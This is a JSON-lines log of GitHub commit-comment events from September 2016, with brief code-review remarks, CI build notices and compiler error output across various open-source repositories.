{"id":"4624628253","type":"CommitCommentEvent","actor":{"login":"revolter"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":19191724,"position":null,"line":null,"path":null,"commit_id":"482502f4f4634b254f875b086ac4ebb001f0e404","created_at":"2016-09-27T14:38:30Z","updated_at":"2016-09-27T14:38:30Z","body":"Yes to the second part of your comment. So we'll have the newer method instead of the older (probably deprecated) method."}},"created_at":"2016-09-27T14:38:30Z"}
{"id":"4624629140","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/GEDKeeper"},"payload":{"comment":{"id":19191727,"position":5,"line":121,"path":"projects/GEDKeeper2/GKCore/GKUtils.cs","commit_id":"4335f35ab02a6338c64aab5322915e7743d259ec","created_at":"2016-09-27T14:38:39Z","updated_at":"2016-09-27T14:38:39Z","body":"Ooops :neutral_face: I thought `s` is `nullptr` by default. Sorry."}},"created_at":"2016-09-27T14:38:39Z"}
{"id":"4624632686","type":"CommitCommentEvent","actor":{"login":"OksanaPovkhanich"},"repo":{"name":"OksanaPovkhanich/UzNU"},"payload":{"comment":{"id":19191736,"position":null,"line":null,"path":null,"commit_id":"cd3d2b4b22c12be64e513aa60426ee40eec37842","created_at":"2016-09-27T14:39:10Z","updated_at":"2016-09-27T14:39:10Z","body":"+++"}},"created_at":"2016-09-27T14:39:10Z"}
{"id":"4624633564","type":"CommitCommentEvent","actor":{"login":"OksanaPovkhanich"},"repo":{"name":"OksanaPovkhanich/UzNU"},"payload":{"comment":{"id":19191737,"position":null,"line":null,"path":null,"commit_id":"cd3d2b4b22c12be64e513aa60426ee40eec37842","created_at":"2016-09-27T14:39:17Z","updated_at":"2016-09-27T14:39:17Z","body":"5"}},"created_at":"2016-09-27T14:39:17Z"}
{"id":"4624641488","type":"CommitCommentEvent","actor":{"login":"damirstuhec"},"repo":{"name":"hackiftekhar/IQKeyboardManager"},"payload":{"comment":{"id":19191759,"position":20,"line":1135,"path":"IQKeyboardManagerSwift/IQKeyboardManager.swift","commit_id":"28b2d9c0ee8169bd6c4cc3dfbdca8f272d059f7c","created_at":"2016-09-27T14:40:29Z","updated_at":"2016-09-27T14:40:29Z","body":"@hackiftekhar Since you've removed this, is that something that could be affecting my problem described here: https://github.com/hackiftekhar/IQKeyboardManager/issues/168#issuecomment-249878806?"}},"created_at":"2016-09-27T14:40:29Z"}
{"id":"4624643890","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19191763,"position":null,"line":null,"path":null,"commit_id":"6a14d11e8810fbbeba459ed4b2d8a800b408e4b6","created_at":"2016-09-27T14:40:51Z","updated_at":"2016-09-27T14:40:51Z","body":"I wonder if we should look to setup ASAN on one of the CI's  ?   This issue has been this way a long time.  It was a 'read overflow' which for Intel usually is not a cato type failure, but that is certainly not proper to read past end of buffer, and will cato fail on certain hardware.   ASAN would have picked this up instantly, and failed the CI."}},"created_at":"2016-09-27T14:40:51Z"}
{"id":"4624645819","type":"CommitCommentEvent","actor":{"login":"RinkeHoekstra"},"repo":{"name":"CLARIAH/grlc"},"payload":{"comment":{"id":19191775,"position":null,"line":null,"path":null,"commit_id":"79cf705c19ed9889516f5f5c6b415ee1923560c1","created_at":"2016-09-27T14:41:08Z","updated_at":"2016-09-27T14:41:08Z","body":"Why oh why! This broke several of my examples. Why the need to add 'grlc' in between?"}},"created_at":"2016-09-27T14:41:08Z"}
{"id":"4624649232","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"drt2016/TanzschulApp"},"payload":{"comment":{"id":19191785,"position":23,"line":42,"path":"server/src/database2/ChatMessage.java","commit_id":"e8fe8ad86c81ea7a061c2e2c1f4a0ca2922996a9","created_at":"2016-09-27T14:41:38Z","updated_at":"2016-09-27T14:41:38Z","body":"@dieechtenilente Your instance is fine because it is part of a known idiom."}},"created_at":"2016-09-27T14:41:38Z"}
{"id":"4624650770","type":"CommitCommentEvent","actor":{"login":"sb2008"},"repo":{"name":"CyanogenMod/cm_platform_sdk"},"payload":{"comment":{"id":19191787,"position":null,"line":null,"path":null,"commit_id":"5d08519c6c6d5a3ab1e30ba9a50f996067cf8caa","created_at":"2016-09-27T14:41:51Z","updated_at":"2016-09-27T14:41:51Z","body":"[  5% 1135/20489] Docs droiddoc: /home...14/out/target/common/docs/cm-api-stubs\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/SelfRemovingSwitchPreference.java:19: 错误: 程序包android.support.v14.preference不存在\r\nimport android.support.v14.preference.SwitchPreference;\r\n                                     ^\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/SelfRemovingSwitchPreference.java:20: 错误: 程序包android.support.v7.preference不存在\r\nimport android.support.v7.preference.PreferenceViewHolder;\r\n                                    ^\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/SelfRemovingSwitchPreference.java:27: 错误: 找不到符号\r\npublic class SelfRemovingSwitchPreference extends SwitchPreference {\r\n                                                  ^\r\n  符号: 类 SwitchPreference\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/ConstraintsHelper.java:24: 错误: 程序包android.support.v7.preference不存在\r\nimport android.support.v7.preference.Preference;\r\n                                    ^\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/ConstraintsHelper.java:25: 错误: 程序包android.support.v7.preference不存在\r\nimport android.support.v7.preference.PreferenceGroup;\r\n                                    ^\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/SelfRemovingSwitchPreference.java:47: 错误: 找不到符号\r\n    public void onBindViewHolder(PreferenceViewHolder holder) {\r\n                                 ^\r\n  符号:   类 PreferenceViewHolder\r\n  位置: 类 SelfRemovingSwitchPreference\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/ConstraintsHelper.java:45: 错误: 找不到符号\r\n    private final Preference mPref;\r\n                  ^\r\n  符号:   类 Preference\r\n  位置: 类 ConstraintsHelper\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/ConstraintsHelper.java:49: 错误: 找不到符号\r\n    public ConstraintsHelper(Context context, AttributeSet attrs, Preference pref) {\r\n                                                                  ^\r\n  符号:   类 Preference\r\n  位置: 类 ConstraintsHelper\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/ConstraintsHelper.java:71: 错误: 找不到符号\r\n    private PreferenceGroup getParent(Preference preference)\r\n                                      ^\r\n  符号:   类 Preference\r\n  位置: 类 ConstraintsHelper\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/ConstraintsHelper.java:71: 错误: 找不到符号\r\n    private PreferenceGroup getParent(Preference preference)\r\n            ^\r\n  符号:   类 PreferenceGroup\r\n  位置: 类 ConstraintsHelper\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/ConstraintsHelper.java:76: 错误: 找不到符号\r\n    private PreferenceGroup getParent(PreferenceGroup root, Preference preference)\r\n                                      ^\r\n  符号:   类 PreferenceGroup\r\n  位置: 类 ConstraintsHelper\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/ConstraintsHelper.java:76: 错误: 找不到符号\r\n    private PreferenceGroup getParent(PreferenceGroup root, Preference preference)\r\n                                                            ^\r\n  符号:   类 Preference\r\n  位置: 类 ConstraintsHelper\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/ConstraintsHelper.java:76: 错误: 找不到符号\r\n    private PreferenceGroup getParent(PreferenceGroup root, Preference preference)\r\n            ^\r\n  符号:   类 PreferenceGroup\r\n  位置: 类 ConstraintsHelper\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/SelfRemovingListPreference.java:19: 错误: 程序包android.support.v7.preference不存在\r\nimport android.support.v7.preference.ListPreference;\r\n                                    ^\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/SelfRemovingListPreference.java:20: 错误: 程序包android.support.v7.preference不存在\r\nimport android.support.v7.preference.PreferenceViewHolder;\r\n                                    ^\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/SelfRemovingListPreference.java:23: 错误: 找不到符号\r\npublic class SelfRemovingListPreference extends ListPreference {\r\n                                                ^\r\n  符号: 类 ListPreference\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/SelfRemovingListPreference.java:43: 错误: 找不到符号\r\n    public void onBindViewHolder(PreferenceViewHolder holder) {\r\n                                 ^\r\n  符号:   类 PreferenceViewHolder\r\n  位置: 类 SelfRemovingListPreference\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/SelfRemovingPreference.java:19: 错误: 程序包android.support.v7.preference不存在\r\nimport android.support.v7.preference.Preference;\r\n                                    ^\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/SelfRemovingPreference.java:20: 错误: 程序包android.support.v7.preference不存在\r\nimport android.support.v7.preference.PreferenceViewHolder;\r\n                                    ^\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/SelfRemovingPreference.java:27: 错误: 找不到符号\r\npublic class SelfRemovingPreference extends Preference {\r\n                                            ^\r\n  符号: 类 Preference\r\nvendor/cmsdk/sdk/src/java/cyanogenmod/preference/SelfRemovingPreference.java:47: 错误: 找不到符号\r\n    public void onBindViewHolder(PreferenceViewHolder holder) {\r\n                                 ^\r\n  符号:   类 PreferenceViewHolder\r\n  位置: 类 SelfRemovingPreference\r\n"}},"created_at":"2016-09-27T14:41:51Z"}
{"id":"4624652469","type":"CommitCommentEvent","actor":{"login":"Kakadu"},"repo":{"name":"embox/embox"},"payload":{"comment":{"id":19191796,"position":23,"line":23,"path":"src/net/util/show_packet.h","commit_id":"8ecf499184aeeb686c689d5c5b80be0f769948e2","created_at":"2016-09-27T14:42:07Z","updated_at":"2016-09-27T14:42:07Z","body":"Может даже перевая половина условия лишняя....."}},"created_at":"2016-09-27T14:42:07Z"}
{"id":"4624655377","type":"CommitCommentEvent","actor":{"login":"juaniscarafia"},"repo":{"name":"ViruX/jcc-web"},"payload":{"comment":{"id":19191804,"position":null,"line":null,"path":null,"commit_id":"7415b870c9b13dafda8453667241072df82542b6","created_at":"2016-09-27T14:42:34Z","updated_at":"2016-09-27T14:42:34Z","body":"changes"}},"created_at":"2016-09-27T14:42:34Z"}
{"id":"4624655906","type":"CommitCommentEvent","actor":{"login":"bensoltoff"},"repo":{"name":"uc-cfss/uc-cfss.github.io"},"payload":{"comment":{"id":19191805,"position":null,"line":null,"path":null,"commit_id":"cb587788a4c59362b259f5f72be34aa3944c1740","created_at":"2016-09-27T14:42:39Z","updated_at":"2016-09-27T14:42:39Z","body":"Sorry about that. Just make sure when you edit any course site files, edit the underlying .Rmd file, then knit it to the HTML. Otherwise when the RMarkdown file gets re-knit, the changes will be lost"}},"created_at":"2016-09-27T14:42:39Z"}
{"id":"4624656380","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19191807,"position":104,"line":131,"path":"HelloWorld/Miscellaneous/MemoryModel2.cs","commit_id":"807f008e39f64d052aa59524fe846905bf91a9f5","created_at":"2016-09-27T14:42:43Z","updated_at":"2016-09-27T14:42:43Z","body":"Здесь, боюсь, есть ошибка. В зависимости от проверки условия, будет выполнена либо одна, либо две команды присваивания. А должно быть в любом случае присвоено обеим переменным, min и max, только в одном случае это одни значения, а в другом - другие.\r\n"}},"created_at":"2016-09-27T14:42:43Z"}
{"id":"4624662709","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19191824,"position":null,"line":null,"path":null,"commit_id":"c0894b645dc135c09f758b5dd66d1b0aa44a036c","created_at":"2016-09-27T14:43:40Z","updated_at":"2016-09-27T14:43:40Z","body":"[Code coverage](https://165-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-27T14:43:40Z"}
{"id":"4624665888","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19191832,"position":107,"line":134,"path":"HelloWorld/Miscellaneous/MemoryModel2.cs","commit_id":"807f008e39f64d052aa59524fe846905bf91a9f5","created_at":"2016-09-27T14:44:10Z","updated_at":"2016-09-27T14:44:10Z","body":"Будет удобно, если с помощью такого комментария /* */ ты подпишешь адрес первого байта в каждой строке, чтобы легче понять, куда будет происходить скачок."}},"created_at":"2016-09-27T14:44:10Z"}
{"id":"4624668256","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19191837,"position":null,"line":null,"path":null,"commit_id":"69f711a0a3823ca60f4f9981243d74438dcbf813","created_at":"2016-09-27T14:44:32Z","updated_at":"2016-09-27T14:44:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1180](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14364&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:11:14"}},"created_at":"2016-09-27T14:44:32Z"}
{"id":"4624673618","type":"CommitCommentEvent","actor":{"login":"fredemmott"},"repo":{"name":"phplang/phack"},"payload":{"comment":{"id":19191851,"position":null,"line":null,"path":null,"commit_id":"1cb603d88be465dcb7ce6d1856c8defb46766c34","created_at":"2016-09-27T14:45:16Z","updated_at":"2016-09-27T14:45:16Z","body":"<3"}},"created_at":"2016-09-27T14:45:16Z"}
{"id":"4624694360","type":"CommitCommentEvent","actor":{"login":"lheagy"},"repo":{"name":"ubcgif/em_examples"},"payload":{"comment":{"id":19191886,"position":4,"line":6,"path":"requirements.txt","commit_id":"dfb3a0b226f282c0d2a43c001329156f9428e724","created_at":"2016-09-27T14:47:21Z","updated_at":"2016-09-27T14:47:21Z","body":"@sgkang , can you take a look? "}},"created_at":"2016-09-27T14:47:21Z"}
{"id":"4624700111","type":"CommitCommentEvent","actor":{"login":"dafyapp"},"repo":{"name":"dafyapp/stroage"},"payload":{"comment":{"id":19191895,"position":1,"line":1,"path":"dufei.txt","commit_id":"e42768c8d2665b8bb5d578dfac1457e101352707","created_at":"2016-09-27T14:48:10Z","updated_at":"2016-09-27T14:48:10Z","body":"2343234"}},"created_at":"2016-09-27T14:48:10Z"}
{"id":"4624703468","type":"CommitCommentEvent","actor":{"login":"bizzehdee"},"repo":{"name":"Udgin/System.Net.Torrent"},"payload":{"comment":{"id":19191904,"position":10,"line":10,"path":"TorrentClient/BaseScraper.cs","commit_id":"fe930fbedf81ffe745cfdc7190c4f5c5ed7b9fac","created_at":"2016-09-27T14:48:39Z","updated_at":"2016-09-27T14:48:39Z","body":"You are violating the licence of this code by removing the licence..."}},"created_at":"2016-09-27T14:48:39Z"}
{"id":"4624709630","type":"CommitCommentEvent","actor":{"login":"Deamon5550"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19191922,"position":62,"line":77,"path":"src/main/java/org/spongepowered/api/event/cause/Cause.java","commit_id":"9368eed75e18c3b23eb5c26f91b9a958c841fd18","created_at":"2016-09-27T14:49:32Z","updated_at":"2016-09-27T14:49:32Z","body":"Theres no way to have it last for `public static Cause of(EventContext ctx, Object cause, Object... causes)`"}},"created_at":"2016-09-27T14:49:32Z"}
{"id":"4624713214","type":"CommitCommentEvent","actor":{"login":"WhistleMaster"},"repo":{"name":"tingbot/ocean"},"payload":{"comment":{"id":19191928,"position":null,"line":null,"path":null,"commit_id":"d70daec027ca5bbfe41004bf8488934df6c60a93","created_at":"2016-09-27T14:49:59Z","updated_at":"2016-09-27T14:49:59Z","body":"👍 "}},"created_at":"2016-09-27T14:49:59Z"}
{"id":"4624713785","type":"CommitCommentEvent","actor":{"login":"dominickendrick"},"repo":{"name":"guardian/frontend"},"payload":{"comment":{"id":19191931,"position":7,"line":482,"path":"common/app/common/configuration.scala","commit_id":"a2fcfee5b26c415726bdeeb5292bbf1c6b485257","created_at":"2016-09-27T14:50:04Z","updated_at":"2016-09-27T14:50:04Z","body":"what about using `getIntegerProperty`"}},"created_at":"2016-09-27T14:50:04Z"}
{"id":"4624715805","type":"CommitCommentEvent","actor":{"login":"Deamon5550"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19191934,"position":42,"line":42,"path":"src/main/java/org/spongepowered/api/event/cause/EventContext.java","commit_id":"9368eed75e18c3b23eb5c26f91b9a958c841fd18","created_at":"2016-09-27T14:50:22Z","updated_at":"2016-09-27T14:50:22Z","body":"I don't think they should be registered as it'd be arbitrary their usage anyway. Some `ContextKeys` class would be fine though."}},"created_at":"2016-09-27T14:50:22Z"}
{"id":"4624716488","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19191938,"position":null,"line":null,"path":null,"commit_id":"e7413f113705ce949065f6ce871bd5aa2ab7c379","created_at":"2016-09-27T14:50:28Z","updated_at":"2016-09-27T14:50:28Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 434](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1242&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2016-09-27T14:50:28Z"}
{"id":"4624717081","type":"CommitCommentEvent","actor":{"login":"core23"},"repo":{"name":"sonata-project/SonataAdminBundle"},"payload":{"comment":{"id":19191941,"position":5,"line":33,"path":"Resources/views/Block/block_admin_list.html.twig","commit_id":"38a63e357c171b6353cfe8952a49fea11f81e322","created_at":"2016-09-27T14:50:34Z","updated_at":"2016-09-27T14:50:34Z","body":"Good catch.\r\n\r\nFixed in https://github.com/sonata-project/SonataAdminBundle/pull/4148"}},"created_at":"2016-09-27T14:50:34Z"}
{"id":"4624718162","type":"CommitCommentEvent","actor":{"login":"SpiroCfiles74"},"repo":{"name":"SpiroCfiles74/learn-chaincode"},"payload":{"comment":{"id":19191944,"position":null,"line":null,"path":null,"commit_id":"d6c1d7b3e0bff1eb312ef6c64cbf8d241b5fef57","created_at":"2016-09-27T14:50:43Z","updated_at":"2016-09-27T14:50:43Z","body":"Helllo:\r\n\r\nI'm building the blockchain for the first time, I'm following the instructions, yet I ca an error when attempting to build the \"learn-chaincode/start\" program: \r\n\r\n.\\chaincode_start.go:34: cannot use new(SimpleChaincode) (type *SimpleChaincode) as type shim.Chaincode in argument to shim.Start:\r\n        *SimpleChaincode does not implement shim.Chaincode (wrong type for Init method)\r\n                have Init(*shim.ChaincodeStub, string, []string) ([]byte, error)\r\n                want Init(shim.ChaincodeStubInterface, string, []string) ([]byte, error)\r\n"}},"created_at":"2016-09-27T14:50:43Z"}
{"id":"4624718782","type":"CommitCommentEvent","actor":{"login":"maakep"},"repo":{"name":"theyuppi/RogueCrawler"},"payload":{"comment":{"id":19191946,"position":null,"line":null,"path":null,"commit_id":"6509bfe9ed20a68c513d44498a57c0e6e5c888ad","created_at":"2016-09-27T14:50:49Z","updated_at":"2016-09-27T14:50:49Z","body":"When applying a gitignore you have to reset the repo, sort of. Because the files you want to ignore are already tracked, meaning git read updates from it. You have to remote all file (git rm -r .) then add everything again (git add .) to remove all files then add all the non-ignored files."}},"created_at":"2016-09-27T14:50:49Z"}
{"id":"4624722771","type":"CommitCommentEvent","actor":{"login":"Deamon5550"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19191952,"position":16,"line":50,"path":"src/main/java/org/spongepowered/api/world/extent/InteractableVolume.java","commit_id":"9368eed75e18c3b23eb5c26f91b9a958c841fd18","created_at":"2016-09-27T14:51:25Z","updated_at":"2016-09-27T14:51:25Z","body":"The point of this is to still be able to separate simulation actions from actual actions if one so wishes."}},"created_at":"2016-09-27T14:51:25Z"}
{"id":"4624724747","type":"CommitCommentEvent","actor":{"login":"Serg-Norseman"},"repo":{"name":"Serg-Norseman/GEDKeeper"},"payload":{"comment":{"id":19191956,"position":5,"line":121,"path":"projects/GEDKeeper2/GKCore/GKUtils.cs","commit_id":"4335f35ab02a6338c64aab5322915e7743d259ec","created_at":"2016-09-27T14:51:42Z","updated_at":"2016-09-27T14:51:42Z","body":"No. In this case compile error - variable not initialized."}},"created_at":"2016-09-27T14:51:42Z"}
{"id":"4624725203","type":"CommitCommentEvent","actor":{"login":"maakep"},"repo":{"name":"theyuppi/RogueCrawler"},"payload":{"comment":{"id":19191958,"position":null,"line":null,"path":null,"commit_id":"6509bfe9ed20a68c513d44498a57c0e6e5c888ad","created_at":"2016-09-27T14:51:45Z","updated_at":"2016-09-27T14:51:45Z","body":"I have done this in branch \"maakep\" @ https://github.com/theyuppi/RogueCrawler/commit/f38ad2634e1f1f148479e619a82c5662d5955490"}},"created_at":"2016-09-27T14:51:45Z"}
{"id":"4624725332","type":"CommitCommentEvent","actor":{"login":"albertmeronyo"},"repo":{"name":"CLARIAH/grlc"},"payload":{"comment":{"id":19191959,"position":null,"line":null,"path":null,"commit_id":"79cf705c19ed9889516f5f5c6b415ee1923560c1","created_at":"2016-09-27T14:51:46Z","updated_at":"2016-09-27T14:51:46Z","body":"The route /<user>/<repo>/<query> is ambiguous otherwise (i.e. also matches requests to /static/img/logo.png or any /foo/bar/foobaz resource that has nothing to do with calling API endpoints). I'm happy to revert if there's a better solution."}},"created_at":"2016-09-27T14:51:46Z"}
{"id":"4624727500","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19191966,"position":null,"line":null,"path":null,"commit_id":"e7413f113705ce949065f6ce871bd5aa2ab7c379","created_at":"2016-09-27T14:52:06Z","updated_at":"2016-09-27T14:52:06Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 434](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1242&buildTypeId=XbimEssentials_XbimEssentials) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:39"}},"created_at":"2016-09-27T14:52:06Z"}
{"id":"4624729313","type":"CommitCommentEvent","actor":{"login":"Adam1609"},"repo":{"name":"NL-4-DEVS/PocketRPG"},"payload":{"comment":{"id":19191971,"position":null,"line":null,"path":null,"commit_id":"c88192636f572228f9eac795e18916f6541b0356","created_at":"2016-09-27T14:52:22Z","updated_at":"2016-09-27T14:52:22Z","body":"yes, that's the bug I have been told you about"}},"created_at":"2016-09-27T14:52:22Z"}
{"id":"4624737545","type":"CommitCommentEvent","actor":{"login":"woutertenbosch"},"repo":{"name":"tgriesser/knex"},"payload":{"comment":{"id":19191980,"position":37,"line":153,"path":"src/dialects/sqlite3/index.js","commit_id":"7069ce509ed1ed6b1c3a0e9dde8d27a29bfcb30d","created_at":"2016-09-27T14:53:33Z","updated_at":"2016-09-27T14:53:33Z","body":"I guess this is the culprit of issue #1701 "}},"created_at":"2016-09-27T14:53:33Z"}
{"id":"4624739983","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19191983,"position":60,"line":27,"path":"collection.html","commit_id":"1bc40aa3aaf027d31847310c3d3f859554db1e1a","created_at":"2016-09-27T14:53:55Z","updated_at":"2016-09-27T14:53:55Z","body":"new line"}},"created_at":"2016-09-27T14:53:55Z"}
{"id":"4624742074","type":"CommitCommentEvent","actor":{"login":"dstogov"},"repo":{"name":"zendtech/php-src"},"payload":{"comment":{"id":19191987,"position":52,"line":659,"path":"ext/opcache/jit/zend_jit.c","commit_id":"5f025e330bb2e2fe3363ba860a882ed1f0258e6b","created_at":"2016-09-27T14:54:14Z","updated_at":"2016-09-27T14:54:14Z","body":"no. these extra checks allow to eliminate more redundant overflow verifications. e.g.\r\n\r\nfunction test($n) {\r\n  if ($n > 2) {\r\n    $x =  $n - 1;\r\n  }\r\n} "}},"created_at":"2016-09-27T14:54:14Z"}
{"id":"4624742097","type":"CommitCommentEvent","actor":{"login":"whitef0x0"},"repo":{"name":"ubclaunchpad/RocketCast"},"payload":{"comment":{"id":19191988,"position":13,"line":13,"path":"RocketCast/CoreDataHelper.swift","commit_id":"4dbbedc23126cdc2e19eabf0b3659501a2b3fb4e","created_at":"2016-09-27T14:54:14Z","updated_at":"2016-09-27T14:54:14Z","body":"This maybe more suited as a constant in some sort of  enum"}},"created_at":"2016-09-27T14:54:14Z"}
{"id":"4624746836","type":"CommitCommentEvent","actor":{"login":"henrypp"},"repo":{"name":"henrypp/wfptool"},"payload":{"comment":{"id":19192001,"position":null,"line":null,"path":null,"commit_id":"206273ce32e2d0fd528b7e7aa6d5a154d30154dd","created_at":"2016-09-27T14:54:54Z","updated_at":"2016-09-27T14:54:54Z","body":"@jasonliul, yes utf16 (second name is ucs-2) little endian and it good for windows localization. i can't add locale with koi-8 encoding used in this file, because all diacritic symbols displayed incorrect."}},"created_at":"2016-09-27T14:54:54Z"}
{"id":"4624750050","type":"CommitCommentEvent","actor":{"login":"marchdf"},"repo":{"name":"trilinos/Trilinos"},"payload":{"comment":{"id":19192009,"position":19,"line":175,"path":"packages/xpetra/src/CrsMatrix/Xpetra_TpetraCrsMatrix.hpp","commit_id":"e822292bbcd8ed05aa65622338e79afb3948fecb","created_at":"2016-09-27T14:55:22Z","updated_at":"2016-09-27T14:55:22Z","body":"Thanks for the prompt response. I opened an issue."}},"created_at":"2016-09-27T14:55:22Z"}
{"id":"4624754968","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19192021,"position":33,"line":37,"path":"album.html","commit_id":"dcaf8de836ea7abf4273579370c79d291602920c","created_at":"2016-09-27T14:56:05Z","updated_at":"2016-09-27T14:56:05Z","body":"newline"}},"created_at":"2016-09-27T14:56:05Z"}
{"id":"4624757493","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19192029,"position":null,"line":null,"path":null,"commit_id":"0345d613dd226e45252ac45e6183f9e0bff67713","created_at":"2016-09-27T14:56:27Z","updated_at":"2016-09-27T14:56:27Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#PfoL9as8SBiOtcfjl2LfLw"}},"created_at":"2016-09-27T14:56:27Z"}
{"id":"4624760304","type":"CommitCommentEvent","actor":{"login":"thisconnect"},"repo":{"name":"edgemethod/nodegit-kit"},"payload":{"comment":{"id":19192036,"position":null,"line":null,"path":null,"commit_id":"1e2cfa6dbec09de86405bb56d9a28f6372c3fdce","created_at":"2016-09-27T14:56:52Z","updated_at":"2016-09-27T14:56:52Z","body":"nice"}},"created_at":"2016-09-27T14:56:52Z"}
{"id":"4624761885","type":"CommitCommentEvent","actor":{"login":"cyprusglobe"},"repo":{"name":"exponentjs/ex-navigation"},"payload":{"comment":{"id":19192042,"position":7,"line":7,"path":"example/package.json","commit_id":"f1819fff27a1caf2c5d431833bbd406b015e02f8","created_at":"2016-09-27T14:57:08Z","updated_at":"2016-09-27T14:57:08Z","body":"@brentvatne What is going on here?"}},"created_at":"2016-09-27T14:57:08Z"}
{"id":"4624763673","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19192045,"position":40,"line":40,"path":"scripts/album.js","commit_id":"dcaf8de836ea7abf4273579370c79d291602920c","created_at":"2016-09-27T14:57:24Z","updated_at":"2016-09-27T14:57:24Z","body":"no need for this whitespace"}},"created_at":"2016-09-27T14:57:24Z"}
{"id":"4624766806","type":"CommitCommentEvent","actor":{"login":"mattt416"},"repo":{"name":"evrardjp/rpc-openstack"},"payload":{"comment":{"id":19192050,"position":35,"line":35,"path":"scripts/functions.sh","commit_id":"8abcdf23304e851a45b0bd9f7a1cdf534619f212","created_at":"2016-09-27T14:57:51Z","updated_at":"2016-09-27T14:57:51Z","body":"I'd indent all this for readability."}},"created_at":"2016-09-27T14:57:51Z"}
{"id":"4624767011","type":"CommitCommentEvent","actor":{"login":"thisconnect"},"repo":{"name":"edgemethod/nodegit-kit"},"payload":{"comment":{"id":19192051,"position":null,"line":null,"path":null,"commit_id":"8561b116195e60c541400cd01c9419a3f77b96e0","created_at":"2016-09-27T14:57:53Z","updated_at":"2016-09-27T14:57:53Z","body":"nice :)"}},"created_at":"2016-09-27T14:57:53Z"}
{"id":"4624770499","type":"CommitCommentEvent","actor":{"login":"ggaillard"},"repo":{"name":"LSWSIO/mission-individuelle-ggaillard"},"payload":{"comment":{"id":19192055,"position":null,"line":null,"path":null,"commit_id":"91a1d054e5dbbe81b84ab996099df4f4b0db8d5a","created_at":"2016-09-27T14:58:23Z","updated_at":"2016-09-27T14:58:23Z","body":"ok, je valide la version de Yannick"}},"created_at":"2016-09-27T14:58:23Z"}
{"id":"4624770797","type":"CommitCommentEvent","actor":{"login":"mattt416"},"repo":{"name":"evrardjp/rpc-openstack"},"payload":{"comment":{"id":19192057,"position":40,"line":40,"path":"scripts/functions.sh","commit_id":"8abcdf23304e851a45b0bd9f7a1cdf534619f212","created_at":"2016-09-27T14:58:26Z","updated_at":"2016-09-27T14:58:26Z","body":"All these seds should just be echo/tee's, so we can be consistent in the way we do this.  We're dealing w/ empty files so let's choose one way to append to it."}},"created_at":"2016-09-27T14:58:26Z"}
